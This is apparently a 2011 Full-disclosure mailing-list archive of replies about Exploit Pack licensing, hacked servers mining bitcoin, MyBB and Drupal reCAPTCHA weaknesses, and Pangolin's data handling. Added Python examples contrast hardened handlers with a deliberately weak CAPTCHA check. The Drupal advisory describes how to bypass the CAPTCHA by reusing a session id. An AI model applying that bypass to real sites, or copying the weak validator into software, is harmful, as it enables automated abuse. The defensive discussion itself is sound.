As to your claim that Exploit Pack is working "without any foundation, company, government and money-giving guy" -- number one, you probably mean 'Venture Capitalist' when you say "money-giving guy". Number two, you seem to be either the PR for or the head of the company that makes INSECT Pro, correct? If INSECT Pro is your product and Exploit Pack is your *open source* product, especially given the proximity of both tools in their field (information security or whatever you want to call it), I would call this claim quite a stretch, at best.

You are providing some measure of similar support for both products; how are you working to eliminate the conflict of interest of pulling something from Exploit Pack into INSECT? Maybe I'm not well-versed enough in your products, but I still do not believe it is possible for you (personally!) to claim Exploit Pack as a personal pet project when it's that close to the one you sell for money.

On Wed, Oct 5, 2011 at 9:06 PM, Juan Sacco juansa...@gmail.com wrote:

ro...@fibertel.com: I know you don't have any experience with open source projects, but this is not the right way. Next time you should try doing it well. Go to GitHub and write the change your own. The community will moderate it and then you will see your proposal applied.

To be clear. The license on the script you mention is the license for all the software not only for the script. Oki Dokie?

1. This is not a chatting room
2. This is not Exploit Pack Dev list

Having that in mind: If you feel like you have to really make another nonsense question after you read all the thread. Then and just then. Send a email to Exploit Pack Dev list.

Please check: http://exploitpack.com/faq
And: http://www.gnu.org/licenses/gpl-3.0.html if you continue having question about GPL v3

I already make a change on the git repository for you root ro...@fibertel.com.ar and your friend xD 0x41 sec...@gmail.com, hope next time you expend two cent for this project.

https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/exploits/code/EasyFTPServer1.7.11.py

#You should have received a copy of the GNU General Public License along with this program.
#If not, see http://www.gnu.org/licenses/
# Script Author: [Coder Name]
# Thanks for let us use this script on Exploit Pack

JSacco

On Thu, Oct 6, 2011 at 12:34 AM, root ro...@fibertel.com.ar wrote:

Juan, You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely. Software business steal code all the time, but they don't release the software for everybody to see! Next time instead of a few laughs at a list, you may get sued and lose real money, you fool. Please learn how licensing works and just then republish all your code.

On 10/05/2011 06:25 PM, Juan Sacco wrote:

If you want the right to demand certain things from the program, then go BUY a program and do not harass people who are writing software for free, or go and help the developers by writing the functionality yourself.

Juan Sacco

On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote:

- * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it
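Review bot: the removed lines are the file's only authorship records (`* @author Stefan Zeiger (szei...@novocode.com)`, `Written by Blake`, `Information Author=Blake Date=August 23 2011`) and the added header assigns the copyright to Juan Sacco alone; without a written grant from those authors the hunk should keep their attribution lines intact and add the Exploit Pack / GPL header beneath them, not in their place. The later `# Script Author: [Coder Name]` placeholder does not repair this, because the names that were deleted are known and should be restored verbatim.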
Re: [Full-disclosure] New open source Security Framework
Re: putting things in the public domain: Daniel J. Bernstein and Lawrence Rosen (of Creative Commons fame, I believe) seem to disagree with you on that: http://cr.yp.to/publicdomain.html

Plus, pretty much the only 'license' djb uses is public domain, so qmail, djbdns, etc. are all public domain. Incidentally, SQLite (*not* written by djb) is *also* public domain, and very widely used, too.

As for being sued for public domain code... I would say it is hard to sue an owner that does not exist (which is what public domain seems to do). Plus, they would probably have to prove malice or something. (I personally still wouldn't do it though!)

On Oct 6, 2011 7:02 AM, valdis.kletni...@vt.edu wrote:

On Thu, 06 Oct 2011 00:34:00 -0300, root said:

You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely.

In particular, if code was written in a country that's a signatory to the Berne conventions, it's usually somewhere between very difficult and impossible to actually place a software work in the public domain - at least under US law, even putting an explicit "This work is hereby placed in the public domain" quite likely does *NOT* suffice - the only two clear ways to public domain in the US are expiration of the "lifetime of the author plus 75 years" copyright, and works for hire by a US federal government employee as part of his duties (so, for instance, NASA photographs are public domain - but photos of NASA activities taken by non-NASA photographers probably aren't).

Also, smart programmers *don't* release their code into the public domain - that means that anybody can do anything with it. And that includes stealing it, using it to make tons of money, and then suing you if they discover a bug. The original reason for the BSD and X11 licenses was because you can't stick a "hold harmless" clause on something you public-domain.
Re: [Full-disclosure] Hacked servers mining for bitcoins?
Hmm -- that's interesting. I wonder if it would be possible/feasible to build a botnet in this fashion that would overtake legitimate bitcoin nodes in terms of CPU power. (You probably know what would happen then)

On Jul 19, 2011 12:11 PM, Robin ro...@rbsec.net wrote:

Had to deal with a server today that had been hacked (still running realVNC 4.0, so there's that lovely bypass exploit released 4 years ago). This server was an exchange/domain controller for a small business.

Not much seemed to have been done to it. From the looks of it, all the attacker had done was make themselves a new account (domain user, local admin, username 'sys'), and had then logged into it, downloaded the Ufasoft bitcoin miner from a russian file sharing site, and then run it. The file was called `mmc.exe`, and was saved in the new account's `My Documents`. No other attempts to hide what was being done.

Has anyone seen this before? Can you make more money from generating bitcoins on a hacked server than sending spam from it? The value of bitcoin is usually offset by the cost of generating it, but if you're using other people's resources to do it, it suddenly seems much more attractive. This looked like a fairly amateur attempt, so it could be a one-off skiddy, but maybe others will follow...

~Robin
Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
On Mon, Jun 27, 2011 at 8:04 PM, YGN Ethical Hacker Group li...@yehg.net wrote:

The XSS results are from purely blackbox scan on Mambo 4.6.5.

Wait, so you're telling me that you're running some program to find these and then just reporting the results to this list? If so, please give some credit to the program's author for actually finding these! Or, if you mean you're just blindly throwing XSS attacks at random variables hoping to find one that sticks... well, why hasn't a script been written for this yet? (Or if one has, what's it called?)
Re: [Full-disclosure] Lutz and Laws
Can I have some of what you're having?

On Jun 17, 2011 8:37 PM, RandallM randa...@fidmail.com wrote:

Only God has created the perfect laws that none have not broken. Man has created in his finite way shadows of these. But not perfect. But they are laws to regulate the good of all. Lutz, you have screwed these in your perhaps well meaning beginning way. Not for the good of others but have harmed the innocent. You have now proved the laws you strike against. You have become trapped in the Se7en sins one at a time. Surely, slowly. Rolling along, they are your down fall.

-- been great, thanks
RandyM a.k.a System
Re: [Full-disclosure] (no subject)
To borrow a mechanism from 'chan' boards...

not telling how everything works
expecting me to trust it blindly
false positives extremely possible
arrogant affirmation of probably inflated success rate and development periods
anonymity-hostile

Lol wat

On Jun 9, 2011 6:21 PM, n...@myproxylists.com wrote:

On Fri, 10 Jun 2011 02:40:16 +0300, n...@myproxylists.com said:

I'm happy to hear it works out to you. A few days ago, I received an email from https://www.proxpn.com/ admin that he suspended fraudulent user VPN account due to the abuse. A fraudster used a stolen credit card using their VPN to purchase a service from us. Needless to say, their CIDRs have been also added to this list.

You're incredibly lucky it was proxpn.com and not comcast.com. ;)

I sense sarcasm. I'm exactly aware of comcast and almost all other U.S cable providers residential address ranges. Did you happen to know that comcast do also provide static IP's for companies, dedicated hosting. I'm also fully aware of botnet proxies that are spread wide to comcast ranges, not only to comcast, to a majority of U.S cable providers. We have a method to detect some of those botnet proxies but I won't go in to details for obvious reasons.

Once again, almost none of you bothered to read features. You have the option to CHOOSE will you block hosting providers or not. It does not block anything by default.

This is my last reply to this topic. Simply, it does provide protection to those who wants it and everyone can configure their API in the way they want. No one is forced to block anything. Period.

At least I managed to open discussion. Something else than daily boring XSS/CRLF bugs. Thanks to everyone for the feedback and interests, whether it was positive or negative.
Re: [Full-disclosure] Musn'tlive
To warn us all about Theo's latest rootkits and collusions with the governments of course.

On May 2, 2011 10:02 AM, Cal Leeming c...@foxwhisper.co.uk wrote:

Huh?

On Mon, May 2, 2011 at 10:43 AM, phocean 0...@phocean.net wrote:

OpenBSD 4.9 was released... where is Musn'tlive ?? :D

-- phocean
Re: [Full-disclosure] Multiple vulnerabilities in MyBB
I had another question too -- this one a bit more general. With services like deathbycaptcha, could CAPTCHA itself now be considered insufficient anti-automation, and how would you address that?

On Apr 25, 2011 11:59 AM, MustLive mustl...@websecurity.com.ua wrote:

Hello Andrew!

You're kidding, right?

No, I'm serious - as I'm always serious when talk about vulnerabilities.

Revealing the names of forum users is practically core functionality.

Of course it's core functionality. But the hole, as I exactly wrote in my advisory, is in revealing of logins. So issue is laying in using logins as a names, so in result the showing names at different parts of the forum is leading to leakage of logins.

It's quite widespread in forum engines and other webapps to disclose their logins (via different Information Leakage and Abuse of Functionality holes) as nothing important. Some CMS like Drupal even have official answer concerning this issue (http://drupal.org/node/1004778). From my side, I've informed Drupal developers about 8 login leakage holes which I found (in Drupal 6, new 7 version must have them all, because of developers' ignoring of this issue) and gave them recommendations why and how to fix such holes to not reveal logins and to preserve Drupal's philosophy.

Many forums (almost all) have similar login leakage vulnerabilities. For example IPB and Vbulletin, which developers I've informed about them in 2009. Like I informed many other developers and admins about such holes, beside developers of MyBB (which ignored to fix them, as many like to do).

I saw a lot of such vulnerabilities for more than six years. And in 2008 I started to write about them at my site (like about holes in WordPress), wrote article "Enumerating logins via Abuse of Functionality vulnerabilities" (http://websecurity.com.ua/2840/) and starting from 2009 I've begun actively fighting with them - by informing many admins and developers about such vulnerabilities.

In my practice most web developers and admins of sites ignored such holes, but there were those who fixed them. For example developers of IPB, which have such holes in IPB 1 and 2, after my informing (at beginning of 2009) fixed all such holes in their engine in IPB 3 (it was released in summer 2009). It must be obvious why I'm using Invision Power Board as engine for my forum for more than 6 years.

The first one requires an activation code sent by email.

This IAA hole can be used for automatic registration. Altogether with IAA hole at registration page. To put captcha to first or to second or to both of the pages - it's up to developers. But the protection must be reliable. Plus they have login leakage in this functionality. I've informed developers of MyBB about all (which I found at brief looking at this engine) login leakage vulnerabilities.

The second one

This functionality with IAA allows spammers to identify valid e-mails of existing forum users and also allows to spam registered users from the forum with password recovery letters. Both of which can be easily mitigated by installing captcha at this functionality.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Andrew Farmer andf...@gmail.com
To: MustLive mustl...@websecurity.com.ua
Cc: Full Disclosure full-disclosure@lists.grok.org.uk
Sent: Saturday, April 23, 2011 10:32 PM
Subject: Re: [Full-disclosure] Multiple vulnerabilities in MyBB

On 2011-04-22, at 09:21, MustLive wrote:

Information Leakage (WASC-13): Logins are names of the users at the forum (and so it's possible to reveal logins at forum's pages).

You're kidding, right? Revealing the names of forum users is practically core functionality. There's no expectation whatsoever that they be kept secret - they're displayed all over the site, and a member list (giving you the ability to download ALL USER NAMES ON THE FORUM OMG) is enabled by default.

Insufficient Anti-automation (WASC-21):
http://site/member.php?action=activate&uid=1
http://site/member.php?action=lostpw
These functionalities have no protection from automated attacks (captcha).

The first one requires an activation code sent by email. I suppose you could *try* to brute-force it, but you'd probably have better luck brute-forcing the password on the email address you sent the activation to.

The second one... well, I suppose you could use it to try to determine whether email addresses belong to anyone on the forum, or send annoying password reset emails, but adding a CAPTCHA wouldn't really change that much.
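The thread above turns on two questions: whether the `lostpw` endpoint leaks which e-mail addresses are registered and lets anyone flood members with reset letters, and whether a CAPTCHA is "reliable protection" now that solving services exist. The following is an added, defender-side illustration of what those two endpoints look like when they do not rely on CAPTCHA alone: an identical reply for known and unknown addresses, a sliding-window cap on reset mails per address and per client, and an activation check with a high-entropy code, an attempt budget, expiry and a constant-time compare. It is not MyBB code and not code from the advisory or the replies; the `AccountService` class, its method names, the in-memory store and the injectable clock are assumptions made so the example runs stand-alone.

```python
"""Non-enumerating, rate-limited lostpw/activation handlers (added example).

Not MyBB code and not from the advisory or the replies: an illustration of
protecting the two endpoints discussed above without relying on CAPTCHA
alone. The in-memory store, the injectable clock and the method names are
assumptions made for a self-contained demo.
"""
import hmac
import secrets
import time
from collections import defaultdict, deque

# Identical reply for known and unknown addresses, so the endpoint cannot be
# used to learn which e-mails belong to forum members.
RESET_RESPONSE = "If that address is registered, a reset link has been e-mailed."
MAX_REQUESTS_PER_WINDOW = 3      # reset mails allowed per e-mail and per client
WINDOW_SECONDS = 3600
MAX_ACTIVATION_ATTEMPTS = 5      # online guessing budget per activation code
ACTIVATION_TTL_SECONDS = 24 * 3600


class SlidingWindowLimiter:
    """Allows at most `limit` events per key inside a sliding `window`."""

    def __init__(self, limit, window, clock=time.time):
        self.limit, self.window, self.clock = limit, window, clock
        self.events = defaultdict(deque)

    def allow(self, key):
        now = self.clock()
        q = self.events[key]
        while q and now - q[0] >= self.window:   # drop events outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class AccountService:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.users = {}          # email -> uid   (constructed sample store)
        self.reset_tokens = {}   # uid -> token
        self.activations = {}    # uid -> [code, issued_at, attempts]
        self.mail_outbox = []    # (email, subject) pairs a real mailer would send
        self.by_email = SlidingWindowLimiter(MAX_REQUESTS_PER_WINDOW, WINDOW_SECONDS, clock)
        self.by_client = SlidingWindowLimiter(MAX_REQUESTS_PER_WINDOW, WINDOW_SECONDS, clock)

    def lost_password(self, email, client_addr):
        """Counterpart of member.php?action=lostpw: same reply whatever the
        outcome, and a cap on reset mails per address and per client."""
        key = email.strip().lower()
        allowed = self.by_client.allow(client_addr) and self.by_email.allow(key)
        uid = self.users.get(key)
        if allowed and uid is not None:
            self.reset_tokens[uid] = secrets.token_urlsafe(32)   # 256-bit token
            self.mail_outbox.append((key, "Password reset"))
        return RESET_RESPONSE

    def issue_activation(self, uid):
        code = secrets.token_hex(16)              # 128 bits: not guessable online
        self.activations[uid] = [code, self.clock(), 0]
        return code

    def activate(self, uid, supplied_code):
        """Counterpart of member.php?action=activate&uid=N: expiry, a small
        attempt budget and a constant-time comparison of the code."""
        entry = self.activations.get(uid)
        if entry is None:
            return False
        code, issued_at, attempts = entry
        if attempts >= MAX_ACTIVATION_ATTEMPTS:
            return False
        if self.clock() - issued_at > ACTIVATION_TTL_SECONDS:
            return False
        entry[2] += 1
        if hmac.compare_digest(code, supplied_code):
            del self.activations[uid]             # single use
            return True
        return False


def demo():
    """Drives both handlers with a fake clock and returns what happened."""
    now = [1_000_000.0]
    svc = AccountService(clock=lambda: now[0])
    svc.users["alice@example.org"] = 1            # constructed sample member
    out = {}
    r_known = svc.lost_password("alice@example.org", "203.0.113.5")
    r_unknown = svc.lost_password("nobody@example.org", "203.0.113.5")
    out["same_reply"] = r_known == r_unknown
    for _ in range(5):                            # a burst from one client
        svc.lost_password("alice@example.org", "203.0.113.5")
    out["mails_in_burst"] = len(svc.mail_outbox)  # capped by the window, not 7
    now[0] += WINDOW_SECONDS                      # the window elapses
    svc.lost_password("alice@example.org", "203.0.113.5")
    out["mails_after_window"] = len(svc.mail_outbox)
    code = svc.issue_activation(1)
    out["wrong_code"] = svc.activate(1, "0" * len(code))
    out["right_code"] = svc.activate(1, code)
    out["reuse"] = svc.activate(1, code)          # single-use: second try fails
    return out
```

Two caveats a practitioner would want: the known-address branch still does more work than the unknown one, so a real deployment hands the mail to a queue rather than sending inline to keep the response time uniform; and the same per-address and per-client budget belongs on the registration form the reply mentions, since a CAPTCHA that a solving service can clear is a speed bump, not a limit.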
Re: [Full-disclosure] Unbelivable, Pangolin 3.2.3 free edition released
Heh -- did anyone else just get spammed by these jokers?

In any case: even if you change this setting where they tell you to, does the code actually honor the change or is it just a farce for the user's benefit? And, perhaps more importantly, why should I have to grab it, blindly trust it and run it to find out? Besides even that, assuming the change was actually honored, how would one go about creating a page that would work with it?

On Mon, Apr 25, 2011 at 8:31 AM, Steven Pinkham steve.pink...@gmail.com wrote:

Rain Liu wrote:

Hi Steven Pinkham, I think this is an old question that has been answered. You can make settings in Pangolin main panel. Edit-Setting-Oracle, Change the Remote Data URL and Remote Info URL as you wish. Exit pangolin and run it again to take effect. Here is example settings http://www.nosec-inc.com/en/images/pangolin-oracle-setting.gif

Wish you guys happy.
BEST REGARDS TO YOU AND YOUR FAMILY
Rain Liu

It's entirely possible that is all there is to it. Let me be perfectly clear: For people in the real world to trust your tool, those fields should be empty by default, and clear instructions and demo code should be given on how to set that feature up on their own servers. A poorly documented feature that sends your data to third parties by default *is unacceptable*, and if you want professional users to take you seriously data privacy needs to be the default.

There's still a lot of questions that are poorly documented like: How does the feature you call "bypass firewall" work? What if any 3rd parties are involved? Can you certify that there no third parties involved in any action of Pangolin besides the Oracle setting, or are there other undiscovered pitfalls for the professional user?

The existence of this poorly documented, data stealing by default option completely undermines my trust in your tool, and I would be VERY cautious in any use of said tool. Personally, I'd rather stick to open source, auditable tools whenever possible, and sqlmap is my sql injection tool of choice. Honestly, your answers to these questions are not likely to make me switch (sqlmap is *that good* in recent releases), but may serve to cut down on my abuse of people who consider using your tool.

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
Re: [Full-disclosure] Multiple vulnerabilities in MyBB
So if you try to sign up with a website and it tells you the username is already taken, is that a login leakage vulnerability? Just want to be clear.

On Apr 25, 2011 11:59 AM, MustLive mustl...@websecurity.com.ua wrote:

[SNIP]
Re: [Full-disclosure] iPhone Geolocation storage
That only seems to apply to Android 3.x, which is not even the most prevalent Android version in the wild. In fact, I think it can only be found on tablets at present, and presumably Google will release the source when they have 3.x stuff workable in mobile phones as well.

On Wed, Apr 20, 2011 at 5:34 PM, Marcio B. Jr. marcio.barb...@gmail.com wrote:

On Wed, Apr 20, 2011 at 4:41 PM, Michael Holstein michael.holst...@csuohio.edu wrote:

Pretty scary btw. I hope there's not the equivalent for Android.

anyone can git the android repository and look at the source

I'm sorry?

http://www.zdnet.com/blog/google/google-android-30-honeycomb-open-source-no-more/2845

Marcio Barbado, Jr.
Re: [Full-disclosure] iPhone Geolocation storage
On Wed, Apr 20, 2011 at 6:04 PM, Marcio B. Jr. marcio.barb...@gmail.com wrote:

On Wed, Apr 20, 2011 at 9:45 PM, Zach C. fxc...@gmail.com wrote:

That only seems to apply to Android 3.x,

"only seems to apply" is a sloppy euphemism. Correct sentence is: IT DOES APPLY.

I guess context is for the weak, since Android 2.3 (the latest non-3.x version) source is out (http://www.androidcentral.com/samsung-releases-gingerbread-source-code-i9000), and the source was also released for all previous versions -- specifically, every version except 3.0. So, it applies to Android 3.0, sure, but that's the only version it applies to, and Google indicates they will be releasing source when it's actually finished and ready to be released on all the platforms Android currently runs on.

which is not even the most prevalent Android version in the wild. In fact, I think it can only be found on tablets at present,

Oh, I see. And that would be one hugely extenuating fact. Sure.

Well, considering every version prior is more prevalent than 3.0 is, and Google will be releasing source... yeah.

But keep clutching that teddy-bear of spiteful vindication that Google didn't release the source code for *one* version of Android!

Oh mommy, GSoC rules! Google is so into FOSS!

They sure are. :D

On Wed, Apr 20, 2011 at 5:34 PM, Marcio B. Jr. marcio.barb...@gmail.com wrote:

On Wed, Apr 20, 2011 at 4:41 PM, Michael Holstein michael.holst...@csuohio.edu wrote:

Pretty scary btw. I hope there's not the equivalent for Android.

anyone can git the android repository and look at the source

I'm sorry?

http://www.zdnet.com/blog/google/google-android-30-honeycomb-open-source-no-more/2845

Marcio Barbado, Jr.

Marcio Barbado, Jr.
Re: [Full-disclosure] [ MDVSA-2011:074 ] qt4
That's your cue, guys who reported every single program using the same DLL vulnerable to DLL hijacking! Find those bad certs and start reporting every single application using Qt! THE WORLD IS COUNTING ON YOU TO INFORM US OF THESE THREATS TO OUR SECURITY.

On Apr 12, 2011 10:19 AM, secur...@mandriva.com wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
Mandriva Linux Security Advisory MDVSA-2011:074
http://www.mandriva.com/security/
___

Package : qt4
Date : April 12, 2011
Affected: 2009.0, 2010.0, 2010.1
___

Problem Description:

It was discovered that the QT packages were affected by the fraudulent certificates problem as well, the same issue as with firefox (MDVSA-2011:068).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to solve this issue.
___

References:

http://www.mandriva.com/security/advisories?name=MDVSA-2011:068
http://bugreports.qt.nokia.com/browse/QTBUG-18338
___

Updated Packages:
Re: [Full-disclosure] Plumber Injection Attack in Bowser's Castle
Lakitu Cloud Security, Inc. Heh. That is an awesome company name actually.

On Apr 1, 2011 8:46 AM, Nelson Elhage nelh...@ksplice.com wrote:

Advisory Name: Plumber Injection Attack in Bowser's Castle
Release Date: 2011-04-01
Application: Bowser's Castle
Versions: Super Mario Bros., Super Mario Bros.: The Lost Levels
Identifier: SMB-1985-0001
Advisory: http://blog.ksplice.com/2011/04/smb-1985-0001-advisory/

Vulnerability Overview
---
Multiple versions of Bowser's Castle are vulnerable to a plumber injection attack. An Italian plumber could exploit this bug to bypass security measures (walk through walls) in order to rescue Peach, to defeat Bowser, or for unspecified other impact.

Exploit
---
http://www.youtube.com/watch?v=rGshxZ1dYjA

This vulnerability is demonstrated by happylee-supermariobros,warped.fm2 [1]. Attacks using this exploit have been observed in the wild, and multiple other exploits are publicly available.

Affected Versions
---
Versions of Bowser's Castle as shipped in Super Mario Bros. [2] and Super Mario Bros.: The Lost Levels [3] are affected.

Solution
---
http://www.youtube.com/watch?v=nacFU7ozeZA

An independently developed patch [4] is available. A binary hot patch [5] to apply the update to an existing version is also available. All users are advised to upgrade.

Mitigations
---
For users unable to apply the recommended fix, a number of mitigations are possible to reduce the impact of the vulnerability. NOTE THAT NO MITIGATION IS BELIEVED TO BE COMPLETELY EFFECTIVE. Potential mitigations include:

- Employing standard defense-in-depth strategies incorporating multiple layers of defense, including Goombas [6], Koopa Troopas [7], Bullet Bills [8], and others.
- Installing poison mushrooms outside your castle [9].
- Installing a firewall to limit access to affected systems. [10]
- Frequently moving your princess between different castles [11].

Credit
---
The vulnerability was originally discovered by Mario and Luigi, of Mario Bros. Security Research. The provided patch and this advisory were prepared by Lakitu Cloud Security, Inc. The hot patch was developed in collaboration with Ksplice, Inc. [12]

Product Overview
---
Bowser's Castle is King Bowser's home and the base of operations for the Koopa Troop. Bowser's Castle is the final defense against assaults by Mario to kidnap Princess Peach, and is guarded by Bowser's most powerful minions. [13]

References
---
[1] http://tasvideos.org/1715M.html
[2] http://en.wikipedia.org/wiki/Super_Mario_Bros.
[3] http://en.wikipedia.org/wiki/Super_Mario_Bros.:_The_Lost_Levels
[4] http://blog.ksplice.com/wp-content/uploads/2011/04/smb-1985-0001.patch
[5] http://blog.ksplice.com/wp-content/uploads/2011/04/patch-smb-1985-0001.sh
[6] http://www.mariowiki.com/Goomba
[7] http://www.mariowiki.com/Koopa_Troopa
[8] http://www.mariowiki.com/Bullet_Bill
[9] http://www.mariowiki.com/Firebar
[10] http://tvtropes.org/pmwiki/pmwiki.php/Main/YourPrincessIsInAnotherCastle
[11] http://www.mariowiki.com/Poison_Mushrooms
[12] http://www.ksplice.com/
[13] http://www.mariowiki.com/Bowser%27s_Castle
Re: [Full-disclosure] SSL Capable NetCat and more
Not to mention the extensions he's undoubtedly using, unless he seriously implemented all the protocols and cryptographic functions in pure Perl.

On Mar 28, 2011 12:07 AM, Michal Zalewski lcam...@coredump.cx wrote:

This one is from command line, maybe the next will be in the server mode or whatever.

Man, I hope you never find out what Perl is written in...

/mz
Re: [Full-disclosure] SSL Capable NetCat and more
Okay, and also let me rephrase the question: what does your tool do that *socat* doesn't?

On Sat, Mar 26, 2011 at 1:17 PM, GomoR go...@gomor.org wrote:

On Sat, Mar 26, 2011 at 08:10:47PM +0200, Anton Ziukin wrote:

What can your tool do that Ncat (http://nmap.org/ncat/guide/index.html) can't?

Hi,

interestingly, I published version 1.00 of scnc in April 2008, the 27th (and it wasn't the first version to be released): http://www.securiteam.com/tools/5RP0O20O0U.html

And more interestingly, ncat has been integrated in nmap SVN in May 2008, the 6th:

r7360 | mixter | 2008-05-06 22:11:22 +0200 (Tue, 06 May 2008) | 1 line
Initial commit of ncat, as of current sourceforge.net HEAD CVS

Considering this timeline, pardon me if I fix bugs found in my software, even when some other tools give the same features.

Besides that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C.

Regards,

--
http://www.GomoR.org/ - Senior Security Engineer
zsh$ alias psed='perl -pe '
Net::Frame = http://search.cpan.org/~gomor/
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
Why yes it does. Shame on me for not reading so well.

On Feb 18, 2011 7:51 AM, Conor conor.l...@gmail.com wrote:

I'm definitely not trying to defend MustntLive, but his timeline shows 2010.12.14 to 2011.02.16. Which makes it 2 months and 2 days, not 2 days, right?

On Feb 18, 2011 7:08 AM, Charles Morris cmor...@cs.odu.edu wrote:
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
fucking *two days*? Is that even enough time for the vendor to acknowledge?

On Feb 17, 2011 9:20 AM, MustLive mustl...@websecurity.com.ua wrote:

Hello list!

I want to warn you about an Insufficient Anti-automation vulnerability in reCAPTCHA for Drupal. In project MoBiC in 2007 I already wrote about bypassing of reCaptcha for Drupal (http://websecurity.com.ua/1505/). This is a new method of bypassing reCaptcha for Drupal.

Affected products:

Vulnerable are all versions of the reCAPTCHA plugin for the Captcha module, versions before 6.x-2.3 and 7.x-1.0.

Details:

Insufficient Anti-automation (WASC-21):

In different forms in Drupal the vulnerable captcha-plugin reCAPTCHA is used. Drupal's Captcha module is vulnerable itself, so besides reCAPTCHA other captcha-plugins also can be vulnerable (at that this exploit is a little different from the exploit for the default Captcha module for Drupal).

For bypassing of the captcha it's needed to use the correct value of captcha_sid; at that it's possible to not answer the captcha (captcha_response) or set any answer. This method of captcha bypass is described in my project Month of Bugs in Captchas (http://websecurity.com.ua/1498/). The attack is possible while this captcha_sid value is active.

Vulnerabilities exist on pages with forms: http://site/contact, http://site/user/1/contact, http://site/user/password and http://site/user/register. Other forms where reCAPTCHA is used also will be vulnerable.

Exploit:

http://websecurity.com.ua/uploads/2011/Drupal%20reCAPTCHA%20bypass.html

Timeline:

2010.12.11 - announced at my site.
2010.12.14 - informed reCAPTCHA developers.
2010.12.14 - informed Google (reCAPTCHA owner).
2011.02.16 - disclosed at my site.

I mentioned about this vulnerability at my site (http://websecurity.com.ua/4752/).

Best wishes regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
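A model of the check the post above describes, added here as an illustration and not code from Drupal or the Captcha module: the weak validator accepts any active captcha_sid without comparing captcha_response and leaves the sid active for replay, while the strict one compares the answer, enforces a lifetime, and consumes the sid on the first attempt. The CaptchaStore class, its TTL and the answer strings are constructed for this example.

```python
import secrets
import time

# Hypothetical in-memory CAPTCHA session store (an assumption for this example,
# not the Captcha module's own storage): a captcha_sid is issued when the form is
# rendered and the expected answer is kept server-side under that sid.
class CaptchaStore:
    def __init__(self, ttl_seconds=600):
        self.ttl = ttl_seconds
        self.sessions = {}  # captcha_sid -> {"answer": str, "issued": float}

    def issue(self, answer, now=None):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"answer": answer, "issued": time.time() if now is None else now}
        return sid


def validate_weak(store, captcha_sid, captcha_response):
    """The failure mode the post describes: any active captcha_sid passes, the
    response is never compared, and the sid stays active for further replays."""
    return captcha_sid in store.sessions


def validate_strict(store, captcha_sid, captcha_response, now=None):
    """Hardened check: the sid must exist and be unexpired, the response must match
    the stored answer, and the sid is consumed on the first attempt either way."""
    session = store.sessions.pop(captcha_sid, None)  # single use: remove before comparing
    if session is None or captcha_response is None:
        return False
    now = time.time() if now is None else now
    if now - session["issued"] > store.ttl:
        return False  # stale sid: the form was rendered too long ago
    expected = session["answer"].strip().lower().encode()
    given = captcha_response.strip().lower().encode()
    return secrets.compare_digest(expected, given)  # constant-time comparison


if __name__ == "__main__":
    store = CaptchaStore()
    sid = store.issue("k7x2q")
    print("weak, no answer:", validate_weak(store, sid, None))       # True: the bypass
    print("strict, no answer:", validate_strict(store, sid, None))   # False
    print("strict, right answer, consumed sid:", validate_strict(store, sid, "k7x2q"))  # False
```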
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
Well, just playing devil's advocate here, mind you, I think much of the irritation from MustLive's postings comes from the following three reasons:

1.) MustLive is primarily a web-application specialist (for the sake of argument)

2.) The vulnerabilities he finds are of a class of vulnerabilities that are most common in his field. (Consider: someone searching for vulnerabilities in internet services directly and doing the binary analysis will primarily be finding buffer or stack overflows, right? In web security, XSS and SQL injection (as well as others I'm undoubtedly forgetting -- I am *NOT* counting not using a CAPTCHA here, see next item) are the most common vulnerabilities, given the lack of binary code to overwrite)

3.) Every so often he posts a vulnerability of questionable risk in the form of "anti-automation", which is essentially a fancy way of saying "ha ha they don't use CAPTCHA". I don't consider that a vulnerability so much as an opening for annoyance; I suppose your mileage may vary.

My guess is that there's a thought that web apps are far easier to crack at than binaries, so vulnerabilities are easier to find, therefore don't waste time finding something that's useless. That may be, in some cases, but sometimes a vulnerability in the web app destroys the entire chain, so to speak.

Thoughts?

-Zach

(P.S. Still just playing devil's advocate; sometimes they get to annoy the crap out of me too.)

On Thu, Feb 17, 2011 at 9:57 AM, Eyeballing Weev eyeballing.w...@gmail.com wrote:

It's either he floods f-d with his vulnerabilities or he has to go out in the real world to farm dirt for export to the West.

On 02/17/2011 12:54 PM, Zach C. wrote:

fucking *two days*? Is that even enough time for the vendor to acknowledge?
Re: [Full-disclosure] encrypt the bash history
Pretty much what the others said, with the addition that if you can't trust root, you simply cannot trust *any* command on that machine, including gpg, since root can compromise them in many ways, too. Best bet is to download it every session and clear it -- but be warned that even any method used to clear it can have a trap that secretly backs it up, however unlikely.

Bottom line -- either trust root or don't use the machine. Those are your options if you feel paranoid enough that you don't want root always watching you.

It's worth pointing out, by the way, that there are ways of watching your program executions without using your bash history, like auditd for example. In fact, I was able to write a script to parse auditd logs out to do just that in a really easy-to-read way -- "user (running as user2) ran /usr/bin/ssh with args: ssh user@host" ...

